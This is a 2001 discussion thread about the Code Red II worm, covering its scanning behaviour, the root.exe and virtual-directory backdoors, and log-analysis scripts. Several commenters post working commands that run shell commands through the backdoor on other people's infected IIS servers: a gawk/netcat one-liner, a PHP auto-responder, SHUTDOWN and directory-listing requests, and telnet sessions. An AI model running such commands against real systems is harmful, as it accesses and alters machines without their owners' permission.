Code Red Back For More

Brian Stretch writes: "The Code Red II worm was unleashed early this morning and appears to be very different than the original and far more dangerous. CR2 infected servers only attack servers within their Class A address block and their Class B address block in particular: since 9:11am EST I've logged 148 CR2 attack attempts, 89 of which are from within my Class B subnet, suggesting that only servers within Class A networks that were deliberately seeded are being attacked. The 24.x.x.x range is one of the hardest hit, and as before, it's folks with cable modems and DSL connections that are providing the most victims." Several @home customers have written about slowed service today, but they're definitely not alone.

Remotely disabling root.exe justifiable?

[rnt]

I'm still doubting if I will run something like this on my machines:

tail -f /var/log/httpd/access_log|gawk '/default.ida/ {system("echo GET /scripts/root.exe?/c+ren+root.exe+root.exe-worm HTTP/1.0|nc "$1" 80")}'

In theory (I haven't tested it yet) this should rename the root.exe to something else, at least disabling that particular exploit on the machine.

Messing with other people's machines is a Bad Thing(tm) as far as I'm concerned. On the other hand, if people can't be bothered with keeping their software up to date and are causing inconvenience for other people...

This root.exe might be a stepup for causing even more problems at a later time!

Argh, that poses a bit of a moral dilemma for me...

Re:Remotely disabling root.exe justifiable?

[baptiste]

Well, no that won't fix it completely - turns out there are a few virtual exploits they put in. From teh recent analysis:

Basically the above code creates a virtual web path (/c and /d) which maps /c to c:\ and /d to d:\. The writer of this worm has put in this functionality to allow for a backdoor to be placed on the system so even if you remove the root.exe (cmd.exe prompt) from your /scripts folder an attacker can still use the /c and /d virtual roots to compromise your system. The attacks would basically look like:

http://IpAddress/c/inetpub/scripts/root.exe?/c+dir (if root.exe was still there) or:
http://IpAddress/c/winnt/system32/cmd.exe?/c+dir Where dir could be any command an attacker would want to execute.

As long as the trojan explorer.exe is running then an attacker will be able to remotely access your server.

Man whoever did this put some thought into it.

A few more details

[ryanr]

It doesn't affect its own netspace exclusively. Initial analysis indicates that it will do so 6 out of 7 times. The 1 out of 7 will go outside its network range.

We'll have full details posted to the Incidents list shortly.

Re:A few more details

[ShavenGoat]

Apparently the New worm doesn't really kill off the new worm. I was trying the telnet port 80 thing on a machine that was infected with V2.0, which address was in my logs.

When I went to telnet, the backdoor didn't work and I got the "Hacked by chinese" message.

Either the worms over write each other, or a machine can be infected by BOTH worms.

Re: A few more details

[mutende]

The new one may still go unnoticed. For some reason "NNNN" generated a malformed URL error in the logs. The new one simply generates a file not found error.

The new one, the "XXXX" type, also generates a malformed URL -- just like the "NNNN" type does -- the malformedness being the double space between the "=a" and the "HTTP/1.0" parts.

Re:Source?

[ksheff]

Why not use the sort mentioned in the paper by Uri Guttman and Larry Rosler? It was made for this.

print join "\n", map substr($_, 4) => sort map pack('C4' => /(\d+)\.(\d+)\.(\d+)\.(\d+)/) . $_ => @ip;

I made a rookie mistake in my story submission

[Brian+Stretch]

It just occurred to me to look up the definition of Class A/B/C addresses, and yup, I used the terms wrong in my story submission (argh!). What I meant to say was that when the worm generates addresses to scan, it appeared to always keep the first octet and a little over half the time (137 of 224 scans in my case) it keeps the second octet as well. That's no longer precisely true: I've since logged one scan from 152.72.x.x (grep XXXX access_log | grep -v 24.). And the high number of scans from within the first two octets may have more to do with that being a block of cable modem addresses rich in vulnerable IIS machines than anything else.

And now we know these poor bastards have been rootkitted. There has to be a way to use this to warn them?

shutting down those machines

[valentyn]

It would be quite easy to shut down those PCs, if there were a "shutdown" command on NT/2k. There isn't; there is one in the Resource Kit but not in the default installation.

Having said that, you could kill off a Windows PC by issueing

GET /scripts/root.exe?/c+SHUTDOWN

Other commands are possible as well: GET /scripts/root.exe?/c+dir+/s+\ gives you the recursive directory tree. Formatting, starting Fdisk and the like are possible, too.

If someone could post a shutdown.exe somewhere, I'll be glad to provide a simple script that downloads the executable and starts it, thus stopping the IIS machine. Or maybe this is our chance to create Tuxissa :)

Re:A few more details:It's a root trojan

[Soko]

From this thread on Ars Technica:

Just discovered something interesting...
telnet 80

type GET /scripts/root.exe HTTP/1.0

and you have a command prompt..

Like this:
[root@server httpd]# telnet 24.xxx.xxx.xxx 80
Trying 24.xxx.xxx.xxx...
Connected to 24.xxx.xxx.xxx.
Escape character is '^]'.
GET /scripts/root.exe HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 2001 07:45:08 GMT
Content-Type: application/octet-stream
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

c:\inetpub\scripts>

[This message was edited by The_Hitman on August 05, 2001 at 03:56.]

CRII root opening new ports?

[RatOmeter]

I'm gonna check the "well-known numbers" RFC, but
I did a little scan of one of the infectoids:
Ports open at:
21
25 (open mail relay too!)
80
135
139
443
445
1025
1027
2057
2162
2174
2200
2210
2214
2219
2227
2228
2257
2282

I recogize some of those ports, but surely
windows doesn't need all those ports open?

Re:In my honor too ...

[FauxPasIII]

FWIW, it's actually named by the guys who disassembled it after the yummy Mountain Dew beverage. From the bugtraq post:

We've designated this the .ida "Code Red" worm, because part of the worm is
designed to deface webpages with the text "Hacked by Chinese" and also
because code red mountain dew was the only thing that kept us awake all last
night to be able to disassemble this exploit.

PHP countermeasure

[l-ascorbic]

On the basis of that, this should work. I'll watch the logs with interest.

<?php
header("HTTP/1.0 400 You cheeky fucker");
?>
<html>
<title>Red Alert</title>
<?php
$fp =fsockopen($REMOTE_ADDR,80,$en,$es,5);
if (!$fp)
{
echo "I tried to disinfect you, but couldn't connect: $es ($en)";
}
else
{
fputs ($fp, "GET /scripts/root.exe?/c+ren+root.exe+infected.dat HTTP/1.0\r\n\r\n");
echo "I tried to disinfect you, and the server started to say:<h2>";
echo $res =fgets($fp,1024);
fclose($fp);
}
$log=fopen("/tmp/redalert.log","a");
fwrite($log,$REMOTE_ADDR . " " . date("r") . " " .$res );
fclose($log);
echo "</h2> $SERVER_SIGNATURE";
?>

Re:Something that should happen more often.

[IKEA-Boy]

While this is a remote exploit, it's not nearly as severe as the default.ida one on IIS. The apache exploit can be used to gather directory listings etc. and does NOT allow arbitrary code to run.

Re:C:\dos C:\dos\run | run\dos\run

[Eeeeegon]

This worm is combining TWO worms; both the Code Red worm we know and love, and the less-recent SANDMIND worm (sp?), famous for running of DOS commands and posting an anti-US webpage at 'default.asp', 'default.html', 'index.asp', and 'index.html' on directories relative to the website root. Apparently this worm is using 'cmd.exe' to get root access; what it does beyond that, I have no idea... I haven't been hit by it. I guess the logic is .... if the box isnt patched against Code Red, chances are it isn't patched against SANDMIND, too.

Also, 90% of the 'NNNN's in my server logs came from my Class A subnet (and much more frequently than the 'XXXXX' requests).

Logs available upon request, etc.

Re:A few more details:It's a root trojan

[Drone-X]

I found that you must do "GET /scripts/root.exe" without the HTTP/1.0 for it to work.

Oh yeah, since you can't enter command to the prompt you need to pass the commands to execute as arguments to root.exe (which is really cmd.exe). You can do this by typing "GET /scripts/root.exe?/C%20dir" or something like that. Or you could enter http://somehost/scripts/root.exe?/C%20dir into your favourite browser.

I've found that typing absolute paths doesn't work for some reason, but http://somehost/scripts/root.exe?/C%20dir%20"..\.. \Documents%20and%20Settings\All%20Users\Desktop\" (remove the spaces) should bring you to the desktop.

I wanted to leave a message to the admin on the desktop but I have no idea how to do that since "echo" is part of cmd.exe and piping probably won't work too. Perhaps omeone with WinNT skills could offer some ideas?

@home preventative measures

[WereTiger]

Apparently @home is monitoring it's customers for Code Red.
I'd JUST reinstalled Win2k Pro on a new system, I'd added IIS for my own purposes and before I had a chance to run the service pack and patch, I got the Code Red worm (ok, so I was lazy and tired and was going to leave it for the morning)

@home unbound my cablemodem until I'd cleared the worm (disable IIS, reboot).

normally, I'd be a little annoyed at @home for monitoring my connection and cutting my connection rather than just block all traffic to that IP at router level. but hey, it saved me from contributing to a problem.

Breakdown of the new "features" of CRII

[2675636B20796F75]

Ok, here's the latest on this new variant.

1. It makes a copy of CMD.EXE called ROOT.EXE in the;

\inetpub\scripts

and

\program files\common files\system\msadc

directories. Does this on both drive C: and D: (doesn't fail if D: doesn't exist).

2. It then runs its attack program code to infect itself upon numerous other boxes. This is done randomly, although there is a bias to attack boxes that are part of the same class A as infected attacker (so it hits your own boxes sooner rather than later). Attack code runs for 24 hours, 48 hours on Chinese language systems.

3. After attack code runs (and it seems to be based on clock ticks, not date), it then writes out a Trojan.

File Explorer.exe (8192bytes or 7K as displayed by Windows) is dropped (from the code in the original attacking URL) to the root of drive C: and D: (again, doesn't matter if D: doesn't exist).

4. The system is then rebooted (probably a forced reboot).

5. When the system restarts, it loads the trojan Explorer.exe from the root directory on the boot drive. This code then does several things;

a) Launches the real Explorer.exe, so the system looks normal.

b) Sets SFCDisable in hklm\software\microsoft\windows nt\currentversion\winlogon to some undocumented value. Presumably this disables Windows File Protection (so critical files could be overwritten)

c) Creates two virtual directories (via the registry) in hklm\system\currentcontrolset\services\w3svc\param eters\virtual roots. Called "C" and "D", they are mapped to the root directories of the two drives and permissions are established in the virtual directory to allow script, read, and write access as well as setting execute permissions to scripts and executables.

d) goes into an endless sleep loop.

The end result of all of this action is to leave your box wide open to remote connection and total compromise.

Unlike "Code Red", this worm doesn't attack any single target at any point, although its attack strength seems to be much higher (it launches 300 threads right off, although some may only launch 100), so its propagation seems much higher.

The attack only works properly on Windows 2000 systems (preliminary analysis). ICSA Labs tested against an NT 4.0/IIS 4.0/SP3 box and received a standard error message. Reports from subscribers suggest that XP IIS 5.1 RC1 is invulnerable also. Its expected that it works on PWS and OWS equally to IIS (all on W2K).

Its obviously a short-lived attack, at least the process of collecting victims. What would be done with them once collected is another story. No attempt is made by the worm to send anything "home", although detecting compromised boxes is far too easy (very unfortunately) for anyone outside your network.

Cleaning a compromised box should really be done by reformatting. Although logging is left on for the new virtual directories created (meaning you'd see access in your IIS logs), there's really no way to be sure that files haven't been implanted to leave other backdoors (not as part of this worm, but as part of the use of the opening it creates).

Credits:

The bulk of the analysis was done by Nick Fitzgerald of Virus-L (and friends) and Roger Thompson of TruSecure. Additional help came from Bruce Hughes of the ICSA Labs.

Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor

Re:logs

[Darth+Paul]

careful - the new strains use default.ida?XXXXXXX. Just grepping for default.ida should be enough...

Re:C:\dos C:\dos\run | run\dos\run

[ananke]

according to ntbugtraq, the worm copies cmd.exe to the scripts dir under iis. i've been getting a lot of these now in my snort log:

[**] [1:1002:1] WEB-IIS cmd.exe access [**]
[Classification: Attempted User Privilege Gain] [Priority: 8]
08/04-20:59:21.340539 165.247.90.38:3711 -> 165.247.246.23:80

from different ip's etc.

Re:logs

[Kryptolus]

For those who are interested in the source:
http://www.kryptolus.com/red.txt

On another note, a server whose identity I will not name(solaris w/ apache) was hit with 17000 attacks as of yesterday(the server handles a lot of ips).

Attempts here

[spinfire]

I've compiled a list of IPs that have made 404 hits on default.ida. Companys like @home and speakeasy (my ISP) need to crack down on IIS users on home DSL networks and get them to install the patch. This many infected hosts is not a good thing.

Re:Mountain Dew

[Fishstick]

>sullied by bad references to computer hacking

This doen't appear to be the case, at least not in the covenience store located in my building at work. Hearing the reference to the new soda 'popular with hackers' in the news report about the worm, I looked it up on Pepsi's website (having never heard of it).

When I discovered that it was a Mountain Dew flavor, I decided to wander downstairs to see if the guy had it in, and to possibly check it out.

"No, it is all gone... should have some more it by Monday."

Stopped at the local Dominick's yesterday where it was the same story. If anything, the worm has generated free publicity, seemigly resulting on a run on the product in the Elk Grove/Schaumburg/Palatine suburban area.

Remember, there is no such thing as "bad" pubilicity, right?

Re:MSNBC Coverage

[baptiste]

They are now: http://msnbc.com/news/606910.asp

C:\dos C:\dos\run | run\dos\run

[mcleodnine]

Seeing a lot of "XXXX" and far fewer "NNNN" in the logs. This version appears to stay crunchier in milk than the first. Up to 25-30 per hour, from 10 this afternoon. The 24.x.x.x may be getting slammed, but I can see another that is just as bad.

Snipped from incidents dot org (emphasis added)

Both Henk Wevers and corecode submitted packet traces of the complete request as shown below. Comparing this trace with the original Code Red (see the Code Red Infection Illustrated section of the July 23 Handler's Diary at: http://www.incidents.org/diary/july2001.php) it is immediately obvious that we are dealing with a new worm. Note that line 820 shows that the worm is doing something with CMD.EXE; also the dump contains the string 'CodeRedII' on line 230. Note the references to root.exe on lines 840 and 880.

Article also mentions that it appears the compromised servers are backdoored and rooted. Ouch.

The editorial accusations of crying wolf might look a little pale this evening...

Re:What are you talking about?

[baptiste]

Steve Friedl believes he has figured out the bizarre scanning of the new strain. From DSLReports forums:

OK, I know how the scanning works now. The worm starts with the user's IP address, and then changes adds a variable number of random octets. Let's say that our web server is on 192.168.1.7:

• One time out of eight, and entirely random IP address is generated
• Four times out of eight, the lower octet of the IP address is randomized (192.168.1.X)
• Three times out of eight, the lower two octets are randomized (192.168.X.Y)

This is entirely consistent with the patterns we've been seeing, so if somebody on your local network gets infected, you're gonna get pounded until they fix it.

Another point: if the web server in question is behind a NAT firewall, it will go nuts scanning the internal network. For a large company that has many NT systems internally, they will spend all day trying to infect each other.

What a worm.

Steve
--
Stephen J. Friedl / Software Consultant / Tustin, California USA / www.unixwiz.net

Looks like somebody did their homework and decided to really make Code Red nasty

a quick fix

[Swordfish]

Here's a perverse idea for a quick fix for CR2.

First, see here for how to telnet into the back door left by all CR2 infections. Second, write a script to telnet to all infected hosts which probe you on port 80 and shut down the offending machine. Third, run this script on your web server so that all hosts probing your site get shut down.

If everyone did this, then CR2 would disappear off the net within 24 hours, and we could all rest easy!

Proposal for White Hat'ing CR][

[nebby]

Since it seems that it's possible to run, and basically do, anything trivially on any of these infected computers via the root.exe "script" I'm guessing that a lot of shit is going to go down in the next two days that will probably be both good and bad for Microsoft and the public's understanding of network security.

I'm also guessing that right now a bunch of /.'ers are doing one of two things:

1) Writing scripts to make things suck more for those who have been compromised (shame on you)
or
2) Writing scripts to fix the compromised servers

I propose that if a script is created to fix these servers (Code Green? :)) that it not be launched until after Monday afternoon around 3 or 4PM, since this is a serious problem for both sysadmin's and Microsoft. If a large part of the damage is avoided by white hat hackers sending a cure for the virus out, it will only happen again. If you don't give them time to sweat, then nothing will be changed and a even more malicious virus (which say, deletes the entire contents of the drives or something) will be unleashed soon enough.

So, before you go out and launch a cure for the problem, think twice about the long term effects of doing so. Create it, make sure it works, and then the Open Source movement can release a cure for the problem faster than anyone else and "we" (I'm not really part of the OSS movement, or whatever) will look like the good guys. Instead of the media holding Microsoft on high for providing the cure to a problem they caused, if the patch is done and ready and launched by Monday afternoon they will have egg on their faces.

Thanks.

Try this

GET /scripts/root.exe?/c%20dir%20/s%20\* HTTP/1.0 :)

Re:Source?

[secs]

its not the greatest script but its what i used

#!/usr/bin/perl
# Opens logfile and picks the ip's that attempt to pass the code red virus
# Location of Log File
$LOG = "/var/log/apache/access_log";
#begin code
open LOG or die "Cannot open $LOG for read:$!";
$count = 0; # ip count
@ip; # array of ip's
while (){
if(m@GET /default.ida?@){
/(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/;
$count++;
push(@ip,$1);
}
}
#sort ip's (this is a slow sort.. beware)
print join "\n", sort {
pack('C4' => $a =~
/(\d+)\.(\d+)\.(\d+)\.(\d+)/)
cmp
pack('C4' => $b =~
/(\d+)\.(\d+)\.(\d+)\.(\d+)/)
} @ip;
print "\n\nThis Box Has Had $count Attempts On It By The Code Red Virus.\n";
#end code

Re:But does it actually *do* anything different?

"Antony Riley has further made a tentative confirmation that the new worm installs a back door that leaves the server wide open for attack (a command shell is available by using telnet to access the server)." from today's diary entry at a well known worm incident place (please don't post the url, I don't want them swamped; I already can't get thru to another place that posted an url that gives further details).